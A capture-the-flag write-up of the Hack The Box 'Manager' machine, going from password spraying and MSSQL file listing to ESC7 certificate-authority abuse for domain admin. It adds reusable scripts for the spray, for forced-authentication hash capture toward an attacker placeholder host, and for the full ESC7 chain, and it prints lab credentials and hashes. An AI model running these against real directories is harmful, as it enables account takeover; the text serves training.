# HTB - Manager

<figure><img src="/files/JZ9ElzovCKjwDVTJUCmy" alt=""><figcaption></figcaption></figure>

## Description

Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. The `xp_dirtree` procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation.

## Enumeration

***

**Nmap Scan**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-ports-scan

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s
5985/tcp  open  wsman
49693/tcp open  unknown
49782/tcp open  unknown

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p53,80,88,135,139,389,445,1433,5985 -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Manager
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-03 01:37:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after:  2122-07-27T10:31:04
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m00s from scanner time.
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-01T19:35:12
|_Not valid after:  2054-11-01T19:35:12
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m01s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap
```

**Summary**

```R
* Open ports: 53,80,88,135,139,389,445,1433,5985
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - KERBEROS - RPC - SMB - MSSQL - WinRM
* Important notes: Domain: manager.htb - DNS:dc01.manager.htb
```

**hosts file**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $sudo sh -c "echo  '$ip dc01 dc01.manager.htb manager.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $tail -n1 /etc/hosts
10.10.11.236 dc01 dc01.manager.htb manager.htb
```

**Service Enumeration**

**HTTP Enumeration**

{% embed url="<http://manager.htb/>" %}

<figure><img src="/files/dbD1eiF6UptwFeedDfcM" alt=""><figcaption></figcaption></figure>

Fuzzing for files and directories turns up nothing beyond what is already linked from the site itself

<figure><img src="/files/LT82mdeCx85ToDGvKngg" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/jdgI5Lj7NMmbHIWgqmGT" alt=""><figcaption></figcaption></figure>

There is not much in this web app; it looks like a static website, so I will switch to the other services running on this box

**SMB & RPC Enumeration**

As `guest` I don't get any useful permissions on the shares, but I can enumerate the domain users with RID cycling (`--rid-brute`)

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $nxc smb dc01 -u 'guest' -p '' --shares

SMB         10.10.11.236    445    DC01             [+] manager.htb\guest: 
SMB         10.10.11.236    445    DC01             [*] Enumerated shares
SMB         10.10.11.236    445    DC01             Share           Permissions     Remark
SMB         10.10.11.236    445    DC01             -----           -----------     ------
SMB         10.10.11.236    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.236    445    DC01             C$                              Default share
SMB         10.10.11.236    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.236    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.11.236    445    DC01             SYSVOL                          Logon server share 
```

<figure><img src="/files/Inuz0LHDrshptjmNNXdx" alt=""><figcaption></figcaption></figure>

## Foothold

***

Since I don't have any password yet, I spray each username as its own password (lowercased) and I get a hit

<figure><img src="/files/HUlb4m6PCrzHj0ybwRf1" alt=""><figcaption></figcaption></figure>

The same spray works against the `MSSQL` login, too

<figure><img src="/files/cXXXMULanwbMEFYeUS9z" alt=""><figcaption></figcaption></figure>
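The two steps above, RID cycling followed by a username-as-password spray, as one script. This is an added example and not the writeup's own commands: the `--rid-brute` sample is constructed (only names that appear on this page plus the built-in accounts every domain has), and `extract_users`, `spray_pairs` and `spray` are my names. It also checks the lockout policy first, which the page does not show but which matters before any spray.

```shell
# Constructed sample of `nxc smb dc01 -u guest -p '' --rid-brute` output (not the
# box's real listing). Format of the interesting part: "RID: DOMAIN\Name (SidType)".
RID_BRUTE_SAMPLE='SMB  10.10.11.236  445  DC01  500: MANAGER\Administrator (SidTypeUser)
SMB  10.10.11.236  445  DC01  501: MANAGER\Guest (SidTypeUser)
SMB  10.10.11.236  445  DC01  502: MANAGER\krbtgt (SidTypeUser)
SMB  10.10.11.236  445  DC01  512: MANAGER\Domain Admins (SidTypeGroup)
SMB  10.10.11.236  445  DC01  1000: MANAGER\DC01$ (SidTypeUser)
SMB  10.10.11.236  445  DC01  1104: MANAGER\Raven (SidTypeUser)
SMB  10.10.11.236  445  DC01  1118: MANAGER\Operator (SidTypeUser)'

# stdin: rid-brute output -> stdout: one sprayable username per line.
# Keeps SidTypeUser entries only, strips the DOMAIN\ prefix, and drops machine
# accounts (trailing $) and krbtgt, which are never worth a spray attempt.
extract_users() {
    grep '(SidTypeUser)$' \
      | sed -e 's/ (SidTypeUser)$//' -e 's/.*\\//' \
      | grep -v '\$$' \
      | grep -vi '^krbtgt$'
}

# stdin: rid-brute output -> stdout: "User:password" pairs where the password is
# the username lowercased, the guess that hit on this box (Operator/operator).
spray_pairs() {
    extract_users | while IFS= read -r u; do
        printf '%s:%s\n' "$u" "$(printf '%s' "$u" | tr 'A-Z' 'a-z')"
    done
}

# Check the lockout policy first, then spray SMB and MSSQL with NetExec.
# --no-bruteforce pairs line N of users.txt with line N of passwords.txt instead
# of trying every combination; --continue-on-success keeps going after a hit.
spray() {   # usage: spray TARGET "$(nxc smb TARGET -u guest -p '' --rid-brute)"
    target=$1
    printf '%s\n' "$2" | extract_users > users.txt
    tr 'A-Z' 'a-z' < users.txt > passwords.txt
    nxc smb   "$target" -u guest -p '' --pass-pol
    nxc smb   "$target" -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
    nxc mssql "$target" -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
}
```

`printf '%s\n' "$RID_BRUTE_SAMPLE" | spray_pairs` yields four candidates (Administrator, Guest, Raven, Operator); the machine account and krbtgt are filtered out because a hit on them is either impossible or pointless, and they only burn lockout attempts.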

With valid credentials for `Operator`, I will look at share access and at the MSSQL database. The shares show nothing interesting, so I move on to `mssql`

<figure><img src="/files/zrvJUEndHTHsOxNVNFtL" alt=""><figcaption></figcaption></figure>

And I'm in the database :))

<figure><img src="/files/TapDFYDApu863K2bXMZY" alt=""><figcaption></figcaption></figure>

Whenever I deal with `mssql`, I work through a checklist of possible attack paths, so here is the one for this box

* Check for sysadmin access
* Check the databases for juicy info and secrets
* Check whether the `mssql` service account's hash can be captured (force it to authenticate to a UNC path)
* Check for impersonation rights over other logins
* Check for trustworthy databases
* Check for linked servers
* Check for read or write access to the file system
* Check for executing commands with `xp_cmdshell`

With this list, I can move forward using the built-in enumeration commands of `mssqlclient.py`

```bash
SQL> SELECT IS_SRVROLEMEMBER('sysadmin')
-----------   
          0 

SQL (MANAGER\Operator  guest@master)> enum_db
name     is_trustworthy_on   
------   -----------------   
master                   0   
tempdb                   0   
model                    0   
msdb                     1   

SQL (MANAGER\Operator  guest@master)> enum_owner
Database   Owner   
--------   -----   
master     sa      
tempdb     sa      
model      sa      
msdb       sa

SQL (MANAGER\Operator  guest@master)> enum_links
SRV_NAME          SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE    SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
---------------   ----------------   -----------   ---------------   ------------------   ------------   -------   
DC01\SQLEXPRESS   SQLNCLI            SQL Server    DC01\SQLEXPRESS   NULL                 NULL           NULL

SQL (MANAGER\Operator  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor   
----------   --------   ---------------   ----------   -------   ------- 
```
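The checklist above as raw T-SQL driven through NetExec, plus the trustworthy-database decision over the `enum_db` / `enum_owner` tables just shown. This is an added example, not from the original writeup: the function names are mine, the `ATTACKER_IP` argument of `capture_query` is a placeholder, and the two tables are copied from the output above so the check runs offline.

```shell
# The checklist as raw T-SQL, one NAME<TAB>QUERY per line, for when
# mssqlclient.py's enum_* helpers are not at hand.
mssql_checks() {
    printf '%s\t%s\n' \
      sysadmin     "SELECT IS_SRVROLEMEMBER('sysadmin')" \
      databases    "SELECT name, is_trustworthy_on, SUSER_SNAME(owner_sid) AS owner FROM sys.databases" \
      impersonate  "SELECT DISTINCT b.name FROM sys.server_permissions a JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'" \
      links        "SELECT name, data_source, provider FROM sys.servers WHERE is_linked = 1" \
      xp_cmdshell  "SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'" \
      dirtree_root "EXEC master..xp_dirtree 'C:\\', 1, 1" \
      webroot      "EXEC master..xp_dirtree 'C:\\inetpub\\wwwroot', 1, 1"
}

# Look up one query by name, e.g. check_query sysadmin
check_query() { mssql_checks | awk -F '\t' -v n="$1" '$1 == n { print $2 }'; }

# Run every check non-interactively through NetExec (nxc mssql -q) and print
# each result under its name.
run_mssql_checks() {   # usage: run_mssql_checks dc01 operator operator
    mssql_checks | while IFS="$(printf '\t')" read -r name query; do
        printf '== %s\n' "$name"
        nxc mssql "$1" -u "$2" -p "$3" -q "$query"
    done
}

# Hash capture: make the SQL service authenticate to our SMB listener
# (impacket-smbserver or Responder) through a UNC path. If SQL Server runs as a
# virtual account or NETWORK SERVICE, the NetNTLM that arrives belongs to the
# computer account (DC01$ here), not to a crackable service user.
capture_query() {   # usage: capture_query ATTACKER_IP  (placeholder address)
    printf '%s\n' "EXEC master..xp_dirtree '\\\\$1\\share', 1, 1"
}

# Trustworthy-database check over the enum_db / enum_owner tables above
# (copied from this writeup). The classic escalation needs all three of:
# TRUSTWORTHY on, owner is a sysadmin (sa), and db_owner for us in that DB.
# This prints the databases meeting the first two; msdb is the only one, and
# a plain login is not db_owner of msdb, so that path is closed here.
ENUM_DB='master 0
tempdb 0
model 0
msdb 1'
ENUM_OWNER='master sa
tempdb sa
model sa
msdb sa'
trustworthy_candidates() {
    { printf '%s\n' "$ENUM_OWNER"; echo '---'; printf '%s\n' "$ENUM_DB"; } \
      | awk '/^---$/ { sep = 1; next }
             !sep     { owner[$1] = $2; next }
             $2 == 1 && owner[$1] == "sa" { print $1 }'
}
```

`run_mssql_checks dc01 operator operator` walks the whole list in one go; `check_query webroot` is the query that, on this box, lists the web root and surfaces the backup zip.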

So far there is no usable path. Even when I tried to capture the service account's hash by making the server authenticate to my SMB share, what came back was the machine account's hash, which is not practically crackable. That is what you get when SQL Server runs as a virtual account or NETWORK SERVICE, since those authenticate to the network as the computer account.

<figure><img src="/files/py7e6aXTn5S1P6MwzNfd" alt=""><figcaption></figcaption></figure>

The last thing I can try is read or write access to the file system. I will use `xp_dirtree` to list the directories under a path.

<figure><img src="/files/vwj1wDyIQcSTRaEi3lsQ" alt=""><figcaption></figcaption></figure>

## Lateral Movement

***

With an IIS web server running on the box, I can try to read `web.config` or other interesting files under its directory, `C:\inetpub`. Two files stand out in the web root: `web.config` and `website-backup-27-07-23-old.zip`

<figure><img src="/files/QhJbS8U9Fut7hl3l0vBY" alt=""><figcaption></figcaption></figure>

When I tried to fetch `web.config` over HTTP it gave me `file not found`, which is expected: IIS request filtering hides `web.config` from web clients by default.

<figure><img src="/files/nkeCW5hleDpOhnZCgspp" alt=""><figcaption></figcaption></figure>

But when I requested the `.zip` file, it downloaded

<figure><img src="/files/mWyImKZKHhVZAI5D5zOp" alt=""><figcaption></figcaption></figure>

I created a new directory, moved the zip file into it, unzipped it and listed the contents. There is an odd hidden `.xml` file

<figure><img src="/files/5nwtqMPFR1KcluFODkmh" alt=""><figcaption></figcaption></figure>

It contains credentials for the `raven` user.

```xml
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $cat .old-conf.xml

..snip..
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
..snip..
```

These credentials are valid and they give me WinRM access, too :))

<figure><img src="/files/Dotazeq0btglT5tj8L3v" alt=""><figcaption></figcaption></figure>

```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $evil-winrm -i dc01 -u raven -p 'R4v3nBe5tD3veloP3r!123'

*Evil-WinRM* PS C:\Users\Raven\Documents> type ..\Desktop\user.txt
518fbc8e81299098bac6e8654ae731a1
```

> User Flag: 518fbc8e81299098bac6xxxxxxxxxxxxx

## Privilege Escalation

***

Looking at the account's privileges and group memberships, I noticed that `raven` is a member of `Certificate Service DCOM Access`, which indicates that AD CS is present in the domain

<figure><img src="/files/cXMfM2MjPtFkzwwWAKpP" alt=""><figcaption></figcaption></figure>

I can confirm with `NetExec` using `ADCS` module

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $nxc ldap dc01 -u raven -p 'R4v3nBe5tD3veloP3r!123' -M adcs

LDAP        10.10.11.236    389    DC01             [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 
ADCS        10.10.11.236    389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.236    389    DC01             Found PKI Enrollment Server: dc01.manager.htb
ADCS        10.10.11.236    389    DC01             Found CN: manager-DC01-CA
```

When dealing with AD CS, the first thing to do is enumerate the possible escalation (`ESC`) paths. I will use `certipy` to find vulnerable templates or CA permissions

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                : 'MANAGER.HTB\\Raven' has dangerous permissions
```

* User `raven` has `Enroll` and `ManageCa` rights on the CA. `ManageCa` is control over the CA configuration itself: he can enable or disable templates on the CA and grant `ManageCertificates` (certificate officer) rights, including to himself. It does not change template ACLs, so this is ESC7, not ESC4.
* The built-in `SubCA` template lets the requester supply the subject and SAN (the property that makes ESC1 templates dangerous) and needs no manager approval, but only `Domain Admins` and `Enterprise Admins` are allowed to enroll in it, so a direct request is denied.
* A denied request is still recorded with a request ID, and a certificate officer (`ManageCertificates`) can issue it afterwards. If `SubCA` is not published on the CA, `ManageCa` lets us enable it first.
* Since we have `ManageCa` rights, we can assign `ManageCertificates` rights to any account, including `raven`.

**Exploitation Path**

1. Enable the `SubCA` template on the CA
2. Grant `ManageCertificates` rights to `raven`
3. Request a certificate from the `SubCA` template with `administrator`'s UPN as the alternative name (the request is denied, but it gets a request ID)
4. Issue the denied request as `raven`, who is now a certificate officer
5. Retrieve the certificate, authenticate with it and access the machine as administrator

```shell
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -enable-template 'SubCA'

Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
```

Grant `ManageCertificates` rights (make `raven` a certificate officer)

```shell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -add-officer raven

Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
```

Confirm the new permission

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $ certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -stdout -dc-ip 10.10.11.236

..snip..
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
```

* With the `SubCA` template enabled and `ManageCertificates` in hand, I request a certificate from `SubCA` with `Administrator` as the alternative name (`-upn`). The CA denies the request with `CERTSRV_E_TEMPLATE_DENIED`, but it is still recorded under a request ID.

```shell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -template SubCA -upn Administrator

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 20
Would you like to save the private key? (y/N) y
[*] Saved private key to 20.key
[-] Failed to request certificate
```

* Note the request ID (`20`) and answer `y` to `Would you like to save the private key? (y/N)`. The certificate will be issued for that key, so without it the retrieved certificate is useless.

```shell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -issue-request 20

Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -retrieve 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 20
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Loaded private key from '20.key'
[*] Saved certificate and private key to 'administrator.pfx'
```

Now I can authenticate as administrator with the `.pfx` file. One caveat from the output above: `Certificate has no object SID` means the certificate carries no SID security extension, so on a DC that enforces strong certificate mapping (KB5014754, full enforcement) it would be rejected; here the DC still accepts the UPN mapping.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy auth -pfx administrator.pfx -domain manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
```

Access the machine with the recovered NT hash (pass-the-hash over WinRM)

```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $evil-winrm -i dc01 -u administrator -H ae5064c2f62317332c88629e025924ef

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
5fa4f9480b1bba44627e3fcfaf5a08a5
```

> Root Flag: 5fa4f9480b1bba44627exxxxxxxxxxxxxxxx
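The whole ESC7 chain above as one script, with a pre-check that parses `certipy find` output to confirm the two CA rights the path depends on before touching the CA. This is an added example and not the author's script: `CERTIPY_FIND_SAMPLE` is a trimmed copy of the output shown earlier, the function names are mine, and the cleanup at the end assumes Certipy 4.x's `-remove-officer` and `-disable-template` options.

```shell
# Trimmed copy of the `certipy find` CA section shown above, used as offline
# sample input (the rest of the output is not needed for this check).
CERTIPY_FIND_SAMPLE='Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven'

# stdin: certipy find -stdout output; $1: Enroll | ManageCa | ManageCertificates
# stdout: the principals holding that right on the CA, one per line. The first
# holder sits on the "RIGHT : principal" line, the rest on indented
# continuation lines until the next "key : value" line.
ca_right_holders() {
    awk -v right="$1" '
        $1 == right && $2 == ":" { grab = 1; sub(/^[^:]*: */, ""); print; next }
        grab && /^ +[A-Za-z.]+\\/ && !/:/ { sub(/^ +/, ""); print; next }
        { grab = 0 }'
}

# ESC7, SubCA variant: our principal needs Enroll (directly or via Authenticated
# Users) and ManageCa on the CA. Returns 0 when the path applies, 1 otherwise.
esc7_subca_applies() {   # usage: esc7_subca_applies 'DOMAIN\User' < certipy_output
    out=$(cat)
    domain=${1%%\\*}
    for right in Enroll ManageCa; do
        printf '%s\n' "$out" | ca_right_holders "$right" \
          | grep -qxF -e "$1" -e "$domain\\Authenticated Users" || return 1
    done
    return 0
}

# The five steps above as one function, plus the cleanup that undoes steps 1
# and 2 afterwards. Assumes Certipy 4.x and that `certipy req` accepts the
# answer to its save-key prompt from stdin.
esc7_subca_exploit() {   # usage: esc7_subca_exploit raven@manager.htb 'pass' manager-DC01-CA Administrator
    upn=$1; pass=$2; ca=$3; victim=$4
    officer=${upn%%@*}; domain=${upn#*@}
    certipy ca -u "$upn" -p "$pass" -ca "$ca" -enable-template SubCA
    certipy ca -u "$upn" -p "$pass" -ca "$ca" -add-officer "$officer"
    # Denied with CERTSRV_E_TEMPLATE_DENIED, but the request gets an ID and we
    # keep the private key (answer y), which the issued certificate will match.
    id=$(printf 'y\n' | certipy req -u "$upn" -p "$pass" -ca "$ca" -template SubCA -upn "$victim" \
           | sed -n 's/.*Request ID is \([0-9][0-9]*\).*/\1/p')
    certipy ca  -u "$upn" -p "$pass" -ca "$ca" -issue-request "$id"
    certipy req -u "$upn" -p "$pass" -ca "$ca" -retrieve "$id"
    # Certipy names the pfx after the lowercased UPN user (administrator.pfx above).
    certipy auth -pfx "$(printf '%s' "$victim" | tr 'A-Z' 'a-z').pfx" -domain "$domain"
    certipy ca -u "$upn" -p "$pass" -ca "$ca" -remove-officer "$officer"
    certipy ca -u "$upn" -p "$pass" -ca "$ca" -disable-template SubCA
}
```

Against the sample, `esc7_subca_applies 'MANAGER.HTB\Raven'` succeeds while `esc7_subca_applies 'MANAGER.HTB\Operator'` fails: Operator can enroll but lacks `ManageCa`, so the same chain is not available to the foothold account. The cleanup steps matter on a real engagement because an extra certificate officer and a published `SubCA` template are exactly what a defender auditing the CA will look for.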

